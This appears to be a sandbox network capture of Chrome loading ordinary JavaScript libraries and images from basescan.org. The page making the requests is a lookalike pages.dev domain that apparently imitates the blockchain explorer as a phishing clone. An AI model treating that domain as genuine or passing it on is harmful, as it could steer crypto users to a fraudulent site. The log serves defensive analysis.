                                                                                                                                                                                                                                              2024-09-28 01:16:08 UTC410INData Raw: 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 74 26 26 74 2e 5f 5f 65 73 4d 6f 64 75 6c 65 3f 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 2e 64 65 66 61 75 6c 74 7d 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 7d 3b 72 65 74 75 72 6e 20 6f 2e 64 28 65 2c 7b 61 3a 65 7d 29 2c 65 7d 2c 6f 2e 64 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 66 6f 72 28 76 61 72 20 6e 20 69 6e 20 65 29 6f 2e 6f 28 65 2c 6e 29 26 26 21 6f 2e 6f 28 74 2c 6e 29 26 26 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 74 2c 6e 2c 7b 65 6e 75 6d 65 72 61 62 6c 65 3a 21 30 2c 67 65 74 3a 65 5b 6e 5d 7d 29 7d 2c 6f 2e 6f 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68
                                                                                                                                                                                                                                              Data Ascii: nction(t){var e=t&&t.__esModule?function(){return t.default}:function(){return t};return o.d(e,{a:e}),e},o.d=function(t,e){for(var n in e)o.o(e,n)&&!o.o(t,n)&&Object.defineProperty(t,n,{enumerable:!0,get:e[n]})},o.o=function(t,e){return Object.prototype.h
                                                                                                                                                                                                                                              2024-09-28 01:16:08 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              128192.168.2.549875104.26.13.1134435896C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-09-28 01:16:08 UTC610OUTGET /assets/js/components/hs.clipboard.js?v=24.4.4.9 HTTP/1.1
                                                                                                                                                                                                                                              Host: basescan.org
                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                                                                                                                              Referer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              2024-09-28 01:16:08 UTC875INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 28 Sep 2024 01:16:08 GMT
                                                                                                                                                                                                                                              Content-Type: application/javascript
                                                                                                                                                                                                                                              Content-Length: 2048
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Cache-Control: max-age=1209600
                                                                                                                                                                                                                                              Cf-Bgj: minify
                                                                                                                                                                                                                                              Cf-Polished: origSize=3747
                                                                                                                                                                                                                                              ETag: "07653e4b33bd91:0"
                                                                                                                                                                                                                                              Last-Modified: Wed, 08 Feb 2023 11:53:00 GMT
                                                                                                                                                                                                                                              Referrer-Policy: origin-when-cross-origin
                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                                                                              Age: 58864
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aW%2FykpI%2BEddgPl31JGSQ76cJfYac5DsP9AQ6qxTbwNTm%2F7plYS4PPbyirrxHRZDq1RJj8OiQh0jlYI3X0rVkSyOGPTblpFM5t23zHAVncaQAGT83P7%2Bqn2vjSqYdzA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                              CF-RAY: 8c9fe2e94cf94302-EWR
                                                                                                                                                                                                                                              2024-09-28 01:16:08 UTC494INData Raw: 3b 28 66 75 6e 63 74 69 6f 6e 28 24 29 7b 27 75 73 65 20 73 74 72 69 63 74 27 3b 24 2e 48 53 43 6f 72 65 2e 63 6f 6d 70 6f 6e 65 6e 74 73 2e 48 53 43 6c 69 70 62 6f 61 72 64 3d 7b 5f 62 61 73 65 43 6f 6e 66 69 67 3a 7b 7d 2c 70 61 67 65 43 6f 6c 6c 65 63 74 69 6f 6e 3a 24 28 29 2c 69 6e 69 74 3a 66 75 6e 63 74 69 6f 6e 28 73 65 6c 65 63 74 6f 72 2c 63 6f 6e 66 69 67 29 7b 74 68 69 73 2e 63 6f 6c 6c 65 63 74 69 6f 6e 3d 73 65 6c 65 63 74 6f 72 26 26 24 28 73 65 6c 65 63 74 6f 72 29 2e 6c 65 6e 67 74 68 3f 24 28 73 65 6c 65 63 74 6f 72 29 3a 24 28 29 3b 69 66 28 21 24 28 73 65 6c 65 63 74 6f 72 29 2e 6c 65 6e 67 74 68 29 72 65 74 75 72 6e 3b 74 68 69 73 2e 63 6f 6e 66 69 67 3d 63 6f 6e 66 69 67 26 26 24 2e 69 73 50 6c 61 69 6e 4f 62 6a 65 63 74 28 63 6f 6e
                                                                                                                                                                                                                                              Data Ascii: ;(function($){'use strict';$.HSCore.components.HSClipboard={_baseConfig:{},pageCollection:$(),init:function(selector,config){this.collection=selector&&$(selector).length?$(selector):$();if(!$(selector).length)return;this.config=config&&$.isPlainObject(con
                                                                                                                                                                                                                                              2024-09-28 01:16:08 UTC1369INData Raw: 2d 63 6f 6e 74 65 6e 74 2d 74 61 72 67 65 74 5d 27 29 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 24 74 68 69 73 3d 24 28 74 68 69 73 29 2c 63 6f 6e 74 65 6e 74 54 61 72 67 65 74 3d 24 74 68 69 73 2e 64 61 74 61 28 27 63 6f 6e 74 65 6e 74 2d 74 61 72 67 65 74 27 29 3b 69 66 28 24 28 63 6f 6e 74 65 6e 74 54 61 72 67 65 74 29 2e 69 73 28 27 69 6e 70 75 74 2c 20 74 65 78 74 61 72 65 61 2c 20 73 65 6c 65 63 74 27 29 29 7b 73 68 6f 72 74 63 6f 64 65 41 72 72 5b 63 6f 6e 74 65 6e 74 54 61 72 67 65 74 5d 3d 24 28 63 6f 6e 74 65 6e 74 54 61 72 67 65 74 29 2e 76 61 6c 28 29 7d 65 6c 73 65 7b 73 68 6f 72 74 63 6f 64 65 41 72 72 5b 63 6f 6e 74 65 6e 74 54 61 72 67 65 74 5d 3d 24 28 63 6f 6e 74 65 6e 74 54 61 72 67 65 74 29 2e 68 74 6d 6c 28 29 3b
                                                                                                                                                                                                                                              Data Ascii: -content-target]').each(function(){var $this=$(this),contentTarget=$this.data('content-target');if($(contentTarget).is('input, textarea, select')){shortcodeArr[contentTarget]=$(contentTarget).val()}else{shortcodeArr[contentTarget]=$(contentTarget).html();
                                                                                                                                                                                                                                              2024-09-28 01:16:08 UTC185INData Raw: 66 61 75 6c 74 43 6c 61 73 73 29 2e 61 64 64 43 6c 61 73 73 28 73 75 63 63 65 73 73 43 6c 61 73 73 29 3b 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 24 28 63 6c 61 73 73 43 68 61 6e 67 65 54 61 72 67 65 74 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 73 75 63 63 65 73 73 43 6c 61 73 73 29 2e 61 64 64 43 6c 61 73 73 28 64 65 66 61 75 6c 74 43 6c 61 73 73 29 3b 7d 2c 38 30 30 29 3b 7d 7d 7d 29 3b 63 6f 6c 6c 65 63 74 69 6f 6e 3d 63 6f 6c 6c 65 63 74 69 6f 6e 2e 61 64 64 28 65 6c 29 3b 7d 29 3b 7d 7d 7d 29 28 6a 51 75 65 72 79 29 3b
                                                                                                                                                                                                                                              Data Ascii: faultClass).addClass(successClass);setTimeout(function(){$(classChangeTarget).removeClass(successClass).addClass(defaultClass);},800);}}});collection=collection.add(el);});}}})(jQuery);


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              129192.168.2.549876104.26.13.1134435896C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-09-28 01:16:08 UTC619OUTGET /assets/vendor/fancybox/jquery.fancybox.min.js?v=24.4.4.9 HTTP/1.1
                                                                                                                                                                                                                                              Host: basescan.org
                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                                                                                                                              Referer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              2024-09-28 01:16:08 UTC810INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 28 Sep 2024 01:16:08 GMT
                                                                                                                                                                                                                                              Content-Type: application/javascript
                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Cache-Control: max-age=1209600
                                                                                                                                                                                                                                              Last-Modified: Mon, 11 Feb 2019 07:30:00 GMT
                                                                                                                                                                                                                                              ETag: W/"0c6f98dbc1d41:0"
                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                              Referrer-Policy: origin-when-cross-origin
                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                                                                              Age: 58864
                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xnBDfrA%2BzPOapdtOseOQOkJi1bKXRWURekEYFzz9nC8VQBM6W69KQES5X6hdEPh4mjr0XIndqBnWHIT0R9nVLypRLvaB7iajEF2BGkAXB5FCbaAjsP5OW079K1poRQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                              CF-RAY: 8c9fe2e98d907c9a-EWR
                                                                                                                                                                                                                                              2024-09-28 01:16:08 UTC559INData Raw: 37 63 37 36 0d 0a 2f 2f 20 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 0d 0a 2f 2f 20 66 61 6e 63 79 42 6f 78 20 76 33 2e 35 2e 36 0d 0a 2f 2f 0d 0a 2f 2f 20 4c 69 63 65 6e 73 65 64 20 47 50 4c 76 33 20 66 6f 72 20 6f 70 65 6e 20 73 6f 75 72 63 65 20 75 73 65 0d 0a 2f 2f 20 6f 72 20 66 61 6e 63 79 42 6f 78 20 43 6f 6d 6d 65 72 63 69 61 6c 20 4c 69 63 65 6e 73 65 20 66 6f 72 20 63 6f 6d 6d 65 72 63 69 61 6c 20 75 73 65 0d 0a 2f 2f 0d 0a 2f 2f 20 68 74 74 70 3a 2f 2f 66 61 6e 63 79 61 70 70 73 2e 63 6f 6d 2f 66 61 6e 63 79 62 6f 78 2f 0d 0a 2f 2f 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 38 20 66 61 6e 63 79 41 70 70 73 0d 0a 2f 2f 0d 0a 2f 2f 20 3d 3d
                                                                                                                                                                                                                                              Data Ascii: 7c76// ==================================================// fancyBox v3.5.6//// Licensed GPLv3 for open source use// or fancyBox Commercial License for commercial use//// http://fancyapps.com/fancybox/// Copyright 2018 fancyApps//// ==
                                                                                                                                                                                                                                              2024-09-28 01:16:08 UTC1369INData Raw: 67 65 72 2e 69 73 28 6f 29 7c 7c 28 65 2e 73 65 6c 65 63 74 6f 72 3f 73 3d 6e 28 65 2e 73 65 6c 65 63 74 6f 72 29 3a 28 69 3d 6f 2e 61 74 74 72 28 22 64 61 74 61 2d 66 61 6e 63 79 62 6f 78 22 29 7c 7c 22 22 2c 69 3f 28 73 3d 74 2e 64 61 74 61 3f 74 2e 64 61 74 61 2e 69 74 65 6d 73 3a 5b 5d 2c 73 3d 73 2e 6c 65 6e 67 74 68 3f 73 2e 66 69 6c 74 65 72 28 27 5b 64 61 74 61 2d 66 61 6e 63 79 62 6f 78 3d 22 27 2b 69 2b 27 22 5d 27 29 3a 6e 28 27 5b 64 61 74 61 2d 66 61 6e 63 79 62 6f 78 3d 22 27 2b 69 2b 27 22 5d 27 29 29 3a 73 3d 5b 6f 5d 29 2c 72 3d 6e 28 73 29 2e 69 6e 64 65 78 28 6f 29 2c 72 3c 30 26 26 28 72 3d 30 29 2c 61 3d 6e 2e 66 61 6e 63 79 62 6f 78 2e 6f 70 65 6e 28 73 2c 65 2c 72 29 2c 61 2e 24 74 72 69 67 67 65 72 3d 6f 29 29 7d 69 66 28 74 2e 63
                                                                                                                                                                                                                                              Data Ascii: ger.is(o)||(e.selector?s=n(e.selector):(i=o.attr("data-fancybox")||"",i?(s=t.data?t.data.items:[],s=s.length?s.filter('[data-fancybox="'+i+'"]'):n('[data-fancybox="'+i+'"]')):s=[o]),r=n(s).index(o),r<0&&(r=0),a=n.fancybox.open(s,e,r),a.$trigger=o))}if(t.c
                                                                                                                                                                                                                                              2024-09-28 01:16:08 UTC1369INData Raw: 74 61 62 69 6e 64 65 78 3d 22 2d 31 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 61 6e 63 79 62 6f 78 2d 62 67 22 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 61 6e 63 79 62 6f 78 2d 69 6e 6e 65 72 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 61 6e 63 79 62 6f 78 2d 69 6e 66 6f 62 61 72 22 3e 3c 73 70 61 6e 20 64 61 74 61 2d 66 61 6e 63 79 62 6f 78 2d 69 6e 64 65 78 3e 3c 2f 73 70 61 6e 3e 26 6e 62 73 70 3b 2f 26 6e 62 73 70 3b 3c 73 70 61 6e 20 64 61 74 61 2d 66 61 6e 63 79 62 6f 78 2d 63 6f 75 6e 74 3e 3c 2f 73 70 61 6e 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 61 6e 63 79 62 6f 78 2d 74 6f 6f 6c 62 61 72 22 3e 7b 7b 62 75 74 74 6f 6e 73 7d 7d 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 61 6e 63 79 62 6f 78
                                                                                                                                                                                                                                              Data Ascii: tabindex="-1"><div class="fancybox-bg"></div><div class="fancybox-inner"><div class="fancybox-infobar"><span data-fancybox-index></span>&nbsp;/&nbsp;<span data-fancybox-count></span></div><div class="fancybox-toolbar">{{buttons}}</div><div class="fancybox
                                                                                                                                                                                                                                              2024-09-28 01:16:08 UTC1369INData Raw: 30 30 2f 73 76 67 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 32 34 20 32 34 22 3e 3c 70 61 74 68 20 64 3d 22 4d 31 32 20 31 30 2e 36 4c 36 2e 36 20 35 2e 32 20 35 2e 32 20 36 2e 36 6c 35 2e 34 20 35 2e 34 2d 35 2e 34 20 35 2e 34 20 31 2e 34 20 31 2e 34 20 35 2e 34 2d 35 2e 34 20 35 2e 34 20 35 2e 34 20 31 2e 34 2d 31 2e 34 2d 35 2e 34 2d 35 2e 34 20 35 2e 34 2d 35 2e 34 2d 31 2e 34 2d 31 2e 34 2d 35 2e 34 20 35 2e 34 7a 22 2f 3e 3c 2f 73 76 67 3e 3c 2f 62 75 74 74 6f 6e 3e 27 2c 61 72 72 6f 77 4c 65 66 74 3a 27 3c 62 75 74 74 6f 6e 20 64 61 74 61 2d 66 61 6e 63 79 62 6f 78 2d 70 72 65 76 20 63 6c 61 73 73 3d 22 66 61 6e 63 79 62 6f 78 2d 62 75 74 74 6f 6e 20 66 61 6e 63 79 62 6f 78 2d 62 75 74 74 6f 6e 2d 2d 61 72 72 6f 77 5f 6c 65 66 74 22 20 74 69 74
                                                                                                                                                                                                                                              Data Ascii: 00/svg" viewBox="0 0 24 24"><path d="M12 10.6L6.6 5.2 5.2 6.6l5.4 5.4-5.4 5.4 1.4 1.4 5.4-5.4 5.4 5.4 1.4-1.4-5.4-5.4 5.4-5.4-1.4-1.4-5.4 5.4z"/></svg></button>',arrowLeft:'<button data-fancybox-prev class="fancybox-button fancybox-button--arrow_left" tit
                                                                                                                                                                                                                                              2024-09-28 01:16:08 UTC1369INData Raw: 2c 61 66 74 65 72 43 6c 6f 73 65 3a 6e 2e 6e 6f 6f 70 2c 6f 6e 41 63 74 69 76 61 74 65 3a 6e 2e 6e 6f 6f 70 2c 6f 6e 44 65 61 63 74 69 76 61 74 65 3a 6e 2e 6e 6f 6f 70 2c 63 6c 69 63 6b 43 6f 6e 74 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 72 65 74 75 72 6e 22 69 6d 61 67 65 22 3d 3d 3d 74 2e 74 79 70 65 26 26 22 7a 6f 6f 6d 22 7d 2c 63 6c 69 63 6b 53 6c 69 64 65 3a 22 63 6c 6f 73 65 22 2c 63 6c 69 63 6b 4f 75 74 73 69 64 65 3a 22 63 6c 6f 73 65 22 2c 64 62 6c 63 6c 69 63 6b 43 6f 6e 74 65 6e 74 3a 21 31 2c 64 62 6c 63 6c 69 63 6b 53 6c 69 64 65 3a 21 31 2c 64 62 6c 63 6c 69 63 6b 4f 75 74 73 69 64 65 3a 21 31 2c 6d 6f 62 69 6c 65 3a 7b 70 72 65 76 65 6e 74 43 61 70 74 69 6f 6e 4f 76 65 72 6c 61 70 3a 21 31 2c 69 64 6c 65 54 69 6d 65 3a 21 31
                                                                                                                                                                                                                                              Data Ascii: ,afterClose:n.noop,onActivate:n.noop,onDeactivate:n.noop,clickContent:function(t,e){return"image"===t.type&&"zoom"},clickSlide:"close",clickOutside:"close",dblclickContent:!1,dblclickSlide:!1,dblclickOutside:!1,mobile:{preventCaptionOverlap:!1,idleTime:!1
                                                                                                                                                                                                                                              2024-09-28 01:16:08 UTC1369INData Raw: 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 74 2e 73 65 74 54 69 6d 65 6f 75 74 28 65 2c 31 65 33 2f 36 30 29 7d 7d 28 29 2c 75 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 2e 63 61 6e 63 65 6c 41 6e 69 6d 61 74 69 6f 6e 46 72 61 6d 65 7c 7c 74 2e 77 65 62 6b 69 74 43 61 6e 63 65 6c 41 6e 69 6d 61 74 69 6f 6e 46 72 61 6d 65 7c 7c 74 2e 6d 6f 7a 43 61 6e 63 65 6c 41 6e 69 6d 61 74 69 6f 6e 46 72 61 6d 65 7c 7c 74 2e 6f 43 61 6e 63 65 6c 41 6e 69 6d 61 74 69 6f 6e 46 72 61 6d 65 7c 7c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 74 2e 63 6c 65 61 72 54 69 6d 65 6f 75 74 28 65 29 7d 7d 28 29 2c 66 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 2c 6e 3d 65 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 66 61 6b 65 65 6c 65 6d 65 6e 74
                                                                                                                                                                                                                                              Data Ascii: function(e){return t.setTimeout(e,1e3/60)}}(),u=function(){return t.cancelAnimationFrame||t.webkitCancelAnimationFrame||t.mozCancelAnimationFrame||t.oCancelAnimationFrame||function(e){t.clearTimeout(e)}}(),f=function(){var t,n=e.createElement("fakeelement
                                                                                                                                                                                                                                              2024-09-28 01:16:08 UTC1369INData Raw: 62 6f 78 2e 63 6c 6f 73 65 28 21 30 29 2c 6e 28 22 62 6f 64 79 22 29 2e 61 64 64 43 6c 61 73 73 28 22 66 61 6e 63 79 62 6f 78 2d 61 63 74 69 76 65 22 29 2c 21 6e 2e 66 61 6e 63 79 62 6f 78 2e 67 65 74 49 6e 73 74 61 6e 63 65 28 29 26 26 21 31 21 3d 3d 72 2e 68 69 64 65 53 63 72 6f 6c 6c 62 61 72 26 26 21 6e 2e 66 61 6e 63 79 62 6f 78 2e 69 73 4d 6f 62 69 6c 65 26 26 65 2e 62 6f 64 79 2e 73 63 72 6f 6c 6c 48 65 69 67 68 74 3e 74 2e 69 6e 6e 65 72 48 65 69 67 68 74 26 26 28 6e 28 22 68 65 61 64 22 29 2e 61 70 70 65 6e 64 28 27 3c 73 74 79 6c 65 20 69 64 3d 22 66 61 6e 63 79 62 6f 78 2d 73 74 79 6c 65 2d 6e 6f 73 63 72 6f 6c 6c 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 2e 63 6f 6d 70 65 6e 73 61 74 65 2d 66 6f 72 2d 73 63 72 6f 6c 6c 62 61 72 7b
                                                                                                                                                                                                                                              Data Ascii: box.close(!0),n("body").addClass("fancybox-active"),!n.fancybox.getInstance()&&!1!==r.hideScrollbar&&!n.fancybox.isMobile&&e.body.scrollHeight>t.innerHeight&&(n("head").append('<style id="fancybox-style-noscroll" type="text/css">.compensate-for-scrollbar{
                                                                                                                                                                                                                                              2024-09-28 01:16:08 UTC1369INData Raw: 74 73 2c 64 29 2c 6e 2e 69 73 41 72 72 61 79 28 64 2e 62 75 74 74 6f 6e 73 29 26 26 28 6c 2e 6f 70 74 73 2e 62 75 74 74 6f 6e 73 3d 64 2e 62 75 74 74 6f 6e 73 29 2c 6e 2e 66 61 6e 63 79 62 6f 78 2e 69 73 4d 6f 62 69 6c 65 26 26 6c 2e 6f 70 74 73 2e 6d 6f 62 69 6c 65 26 26 28 6c 2e 6f 70 74 73 3d 68 28 6c 2e 6f 70 74 73 2c 6c 2e 6f 70 74 73 2e 6d 6f 62 69 6c 65 29 29 2c 61 3d 6c 2e 74 79 70 65 7c 7c 6c 2e 6f 70 74 73 2e 74 79 70 65 2c 72 3d 6c 2e 73 72 63 7c 7c 22 22 2c 21 61 26 26 72 26 26 28 28 73 3d 72 2e 6d 61 74 63 68 28 2f 5c 2e 28 6d 70 34 7c 6d 6f 76 7c 6f 67 76 7c 77 65 62 6d 29 28 28 5c 3f 7c 23 29 2e 2a 29 3f 24 2f 69 29 29 3f 28 61 3d 22 76 69 64 65 6f 22 2c 6c 2e 6f 70 74 73 2e 76 69 64 65 6f 2e 66 6f 72 6d 61 74 7c 7c 28 6c 2e 6f 70 74 73 2e
                                                                                                                                                                                                                                              Data Ascii: ts,d),n.isArray(d.buttons)&&(l.opts.buttons=d.buttons),n.fancybox.isMobile&&l.opts.mobile&&(l.opts=h(l.opts,l.opts.mobile)),a=l.type||l.opts.type,r=l.src||"",!a&&r&&((s=r.match(/\.(mp4|mov|ogv|webm)((\?|#).*)?$/i))?(a="video",l.opts.video.format||(l.opts.
                                                                                                                                                                                                                                              2024-09-28 01:16:08 UTC1369INData Raw: 2c 6c 2e 6f 70 74 73 2e 63 61 70 74 69 6f 6e 20 69 6e 73 74 61 6e 63 65 6f 66 20 6e 7c 7c 28 6c 2e 6f 70 74 73 2e 63 61 70 74 69 6f 6e 3d 76 6f 69 64 20 30 3d 3d 3d 6c 2e 6f 70 74 73 2e 63 61 70 74 69 6f 6e 3f 22 22 3a 6c 2e 6f 70 74 73 2e 63 61 70 74 69 6f 6e 2b 22 22 29 2c 22 61 6a 61 78 22 3d 3d 3d 6c 2e 74 79 70 65 26 26 28 63 3d 72 2e 73 70 6c 69 74 28 2f 5c 73 2b 2f 2c 32 29 2c 63 2e 6c 65 6e 67 74 68 3e 31 26 26 28 6c 2e 73 72 63 3d 63 2e 73 68 69 66 74 28 29 2c 6c 2e 6f 70 74 73 2e 66 69 6c 74 65 72 3d 63 2e 73 68 69 66 74 28 29 29 29 2c 6c 2e 6f 70 74 73 2e 6d 6f 64 61 6c 26 26 28 6c 2e 6f 70 74 73 3d 6e 2e 65 78 74 65 6e 64 28 21 30 2c 6c 2e 6f 70 74 73 2c 7b 74 72 61 70 46 6f 63 75 73 3a 21 30 2c 69 6e 66 6f 62 61 72 3a 30 2c 74 6f 6f 6c 62 61
                                                                                                                                                                                                                                              Data Ascii: ,l.opts.caption instanceof n||(l.opts.caption=void 0===l.opts.caption?"":l.opts.caption+""),"ajax"===l.type&&(c=r.split(/\s+/,2),c.length>1&&(l.src=c.shift(),l.opts.filter=c.shift())),l.opts.modal&&(l.opts=n.extend(!0,l.opts,{trapFocus:!0,infobar:0,toolba
                                                                                                                                                                                                                                              2024-09-28 01:16:08 UTC1369INData Raw: 78 2e 69 73 4d 6f 62 69 6c 65 3f 36 30 30 3a 32 35 30 29 29 7d 29 2c 72 2e 6f 6e 28 22 6b 65 79 64 6f 77 6e 2e 66 62 22 2c 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 6f 3d 6e 2e 66 61 6e 63 79 62 6f 78 3f 6e 2e 66 61 6e 63 79 62 6f 78 2e 67 65 74 49 6e 73 74 61 6e 63 65 28 29 3a 6e 75 6c 6c 2c 69 3d 6f 2e 63 75 72 72 65 6e 74 2c 61 3d 74 2e 6b 65 79 43 6f 64 65 7c 7c 74 2e 77 68 69 63 68 3b 69 66 28 39 3d 3d 61 29 72 65 74 75 72 6e 20 76 6f 69 64 28 69 2e 6f 70 74 73 2e 74 72 61 70 46 6f 63 75 73 26 26 65 2e 66 6f 63 75 73 28 74 29 29 3b 69 66 28 21 28 21 69 2e 6f 70 74 73 2e 6b 65 79 62 6f 61 72 64 7c 7c 74 2e 63 74 72 6c 4b 65 79 7c 7c 74 2e 61 6c 74 4b 65 79 7c 7c 74 2e 73 68 69 66 74 4b 65 79 7c 7c 6e 28 74 2e 74 61 72 67 65 74 29 2e 69 73 28 22
                                                                                                                                                                                                                                              Data Ascii: x.isMobile?600:250))}),r.on("keydown.fb",function(t){var o=n.fancybox?n.fancybox.getInstance():null,i=o.current,a=t.keyCode||t.which;if(9==a)return void(i.opts.trapFocus&&e.focus(t));if(!(!i.opts.keyboard||t.ctrlKey||t.altKey||t.shiftKey||n(t.target).is("


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              130192.168.2.549878104.26.12.1134435896C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-09-28 01:16:08 UTC361OUTGET /images/gen/metawin_20.png HTTP/1.1
                                                                                                                                                                                                                                              Host: basescan.org
                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              2024-09-28 01:16:08 UTC855INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 28 Sep 2024 01:16:08 GMT
                                                                                                                                                                                                                                              Content-Type: image/png
                                                                                                                                                                                                                                              Content-Length: 567
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Cache-Control: max-age=1209600
                                                                                                                                                                                                                                              Cf-Bgj: imgq:100,h2pri
                                                                                                                                                                                                                                              Cf-Polished: status=not_needed
